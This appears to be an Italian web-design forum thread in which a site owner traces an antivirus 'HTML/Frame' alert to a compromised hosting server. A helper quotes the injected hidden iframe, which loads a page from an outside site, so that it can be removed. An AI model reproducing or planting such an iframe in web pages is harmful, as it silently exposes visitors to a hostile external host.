Problema con virus
Autore: Carlo S.
Visite 2315,
Followers 1,
Condiviso 0
Buongiorno, ho un problema con il mio sito web fatto con Website. Una volta pubblicato, l'antivirus trova un malware html/frame. Ho aggiornato diverse volte abilitando la protezione html ma il problema persiste. Il provider mi dice che il problema e' del software con cui e' stato fatto il sito, che non da' le protezioni adeguate. Come posso evitare questa spiacevole situazione?
Postato il
... dove viene riscontrato questo virus...?... ...il programma non ne genera...!...
... in genere è un problema che risiede nel proprio PC...
... potrebbe dipendere anche da script esterni o link, inseriti e di dubbia provenienza...
... un link della pagina con il problema permetterebbe agli esperti di valutare...
.
ciao, KolAsim
Autore
Il problema viene riscontrato quando il sito e' pubblicato on line. il computer e' protetto con l'ultima versione aggiornata di avg con internet security, scansioniamo periodicamente con microsoft security, ma il pc sembra a posto anche secondo un tecnico.
ho aggiornato la versione on line del sito diverse volte, cancellando tutti i file preesistenti. La password di ftp (e' stata aggiornata anche questa) dovrebbe essere "sicura" essendo molto lunga e complessa.... il provider dice che il loro sistema e' protetto, che il problema e' o nel programma con cui e' stato fatto il sito che non offrirebbe le protezioni adeguate oppure nel ns. pc.....
davvero non so proprio piu' cosa fare. il sito e' www.tafsrl.to , l'antivirus riconosce stringhe di html/frame pericolose, in effetti all'interno del codice html ho riscontrato indirizzamenti verso siti esterni.
grazie per l'aiuto.
... lo vedo regolare; ... se ci fosse qualcosa di strano in quella pagina, google chrome lo rivelerebbe, come avvenuto per altri casi, ...ed è regolare su altri browser...
.
ciao
Autore
quando uno visita le pagine , (noi utilizziamo explorer) ad esempio quelle del profilo (l'ho fatto anche ora) avg mi blocca la pagina e mi scrive virus rilevato html/frmae - gravita' alta - identificato da online shield - informazioni estese : porta 80
http://www.avgthreatlabs.com/website-safety-reports/domain/tafsrl.to/linkreport/www.tafsrl.to%2Fprofilo.html/?utm_source=TDPU&utm_medium=OS
http://www.avgthreatlabs.com/website-safety-reports/domain/tafsrl.to/
questi sono i link che avg mi apre
l'antivirus e' aggiornato a questa mattina, se facciamo la scansione del pc, l'antivirus e microsoft security non trovano nulla.
mi scuso per l'insistenza ma ci hanno detto che il problema esiste per la "semplicita'" del linguaggio utilizzato per la creazione del sito dal programma utilizzato.
Stiamo anche pensando come ultima spiaggia di cambiare provider...
grazie!
e' successo anche a me, solo però con i siti creati ccon wsx5.
Devi cancellare dal ftp tutto il sito, e cambiare la password.
Poi lo ripubblichi.
... il programma non c'entra, e proprio quello lì qualche anno fa aveva cancellato dal sistema gli eseguibili di swishmax e websitex5 credendo che fossero virus, e senza preavviso, tanto per capirci...
... comunque, visto che ti da quell'avviso, incomincia a provare togliendo l'iframe, che è scorretto e che hai inserito tu e non il programma in fondo alla pagina, e vedi che risultato ottieni...
... poi, come mai hai queste pagine...?...
http://www.tafsrl.to/(*)profilo.html (*) = %+2+F = / ...da loro rilevato...?...
http://www.tafsrl.to/profilo.html
.
ciao
Autore
Prima di cancellare e togliere sto cercando di capire quale sarebbe l'iframe che avrei messo io ;-) potresti per favore aiutarmi? non vorrei aver messo, per errore o semplice ignoranza, qualcosa che il sistema riconosce come virus .
Qualche tempo fa, dopo aver notato il problema, avevo scaricato una pagina pubblicata on line e nel linguaggio html ho visto che c'era una stringa che indirizzava ad un altro sito.
l'ho cancellata e ripubblicata. Oggi ho provato a riscaricare una pagina in cui l'antivirus mi riconosce l'errore, alla ricerca di nuovo della stringa malevola, ma non mi pare di averlavista. Fatto sta che io la pagina online non riesco a vederla perche' bloccata.
Nell'ultima pubblicazione che ho fatto ho abilitato la protezione html pensando di aver risolto i problemi, ma cosi non e' stato...
cosa posso fare per impedire nel futuro che qualcuno possa immettere queste iniezioni nel sito? c'e' qualcosa che devo abilitare nel programma quando creo le pagine?
ancora grazie!
ciao
... in fondo alla pagina c'è questo:
<iframe name=Twitterscrolling=autoframeborder=noalign=centerheight=85width=99src=http://pawsbarkery.com/post.php?id=152385></iframe>
... il SRC è errato, andrebbe virgolettato, ...e devi vedere coma hai fatto ad inserirlo, per eliminarlo alla fonte...
... prova a guardare nei vari pannelli ESPERTO | BODY e simili, altrimenti lo elimini manualmente direttamente col filesmanager, in rete...
.
ciao
Autore
questo e' proprio quello che intendevo dire, la stringa del frame non l'ho assolutamente inserita io, il problema che riconosce l'antivirus e' proprio questa iniezione (ossia qualcuno che ha inserito) di frame. e' un indirizzamento ad un altro sito ma non avendolo messo io non ho la piu' pallida idea di come toglierlo.
se scarico la pagina incriminata e la apro con un programma tipo frontpage dove lavoro con l'html questa stringa non la vedo....
cosa vuol dire eliminarlo con il filesmanager in rete?
... come detto prima, puoi farlo benissimo in rete; ...apri il files manager del server, che trovi nel pannello che ti ha messo a disposizione nello spazio WEB, editi la pagina in HTML, ed in fondo ad essa selezioni ed elimina il codice, quindi salva...
... oppure, sempre semplice al tempo stesso, esporta il sito su DISCO, apri nel blocco note la pagina html, ed in fondo ad essa selezioni ed elimina il codice, quindi fai SALVA...
... a questo punto esporta il contenuto della cartella su DISCO con programma FTP di terze parti, (filezilla, WS_FTP, simili)...
.
ciao
Autore
Rieccomi! oggi ho provato a riprendere il progetto del sito, ho fatto l'esportazione su disco , ho aperto le pagine con il blocco note ma della stringa naturalmente nessuna traccia.
anche perche' il problema nasce nel momento in cui il file viene pubblicato.
ho provato anche a scaricare con filezilla alcuni files incriminati dall'antivirus, li ho aperti con blocco note, ma anche qui niente...
una domanda: non hai un numero telefonico con il quale sia possibile parlare a te o ad un qualunque altro "esperto" perche' magari a voce viene piu' semplice?
grazie ancora
ciao
... quindi, la prova filezilla non ha funzionato, perchè vedo ancora allo stesso modo...
... per il resto, potrebbe dipendere dal tuo servizio hosting, se appare senza che tu faccia niente; ...non è mai successo niente del genere se non nei termini detti...
... anzi verifica su un altro servizio, magari in sotto dominio o su Altervista, così avrai la certezza se dipende da virus tuo o del server...
... non ho contatti alternativi...
...
.
ciao
Autore
ciao! ti ringrazio dell'ultimo consiglio che mi hai dato perche' come da te suggerito ho pubblicato il sito su un dominio di altervista www.transaquariumfish.altervista.org e tutto funziona benissimo. Per riprova, visitalo anche tu e perfavore dimmi se continui a vedere le stringhe....
ho avuto la conferma ai miei dubbi: ovvero che il problema sta nel server dove il sito era pubblicato anche se loro hanno sempre negato che potesse essere cosi... per loro il problema e' nel tipo di sito che ho pubblicato, per la semplicita' del linguaggio creato dal programma utilizzato oppure nel mio computer.
PEr loro avrei dovuto spendere dei soldi per investire su un sito piu' complesso difficilmente attaccabile da virus e hacker.
Ora ho ancora una domanda approfittando della tua gentilezza: sullo stesso provider abbiamo anche un negozio online www.fishinnet.net creato con una tecnologia completamente differente. questo sito ha gli stessi problemi del sito di taf. ma anche in questo caso per loro la colpa risiede nella tecnologia ormai vetusta con cui l'e commerce e' stato creato.
Ora io pensavo quindi di rifare il negozio on line con il vostro programma che prevede anche la parte dedicata alla vendita e al commercio. e pubblicarlo su un altro server, naturalmente. secondo te potremmo ritrovarci nella stessa situazione di ora molto presto? ovvero il sito di ecommerce creato con website puo' essere piu' facilmente di altri attaccabile da virus e malware? c'e' qualche accortezza nella creazione del nuovo sito che dobbiamo tenere?
grazie per l'aiuto e di tutte le informazioni che mi hai fornito!
... quello che posso dirti, per come si sono comportati e per quello che hanno detto, di trasferirti rapidamente altrove...
... il programma non ha mai creato nessun problema nei servizi di hosting più comuni in particolare con quelli ad esso gemellati, ONE.COM - A2HOSTING ...
.
ciao
Autore
grazie ancora di tutto!!!!
provero' a dare un'occhiata...
ciao
Buona sera a tutti,
oggi mi è arrivata una mail da google nella quale si dice che il mio sito ha un virus o malware in home. Come può essere accaduto? preciso che il computer utilizzato è regolarmente scansionato. Come posso intervenire per rimuovere il problema?
Grazie a tutti
Andrea
... quale sito ...?... ... e senza motivazione...?...
... quello che avevi indicato più su risulta ancora fatto con una versione obsoleta:
WebSite X5 Evolution 8.0.11
... l'ultima versione stabile della v.8 è la 8.0.16
...
... converrebbe fare le conversioni alla versione attuale v.10
.
ciao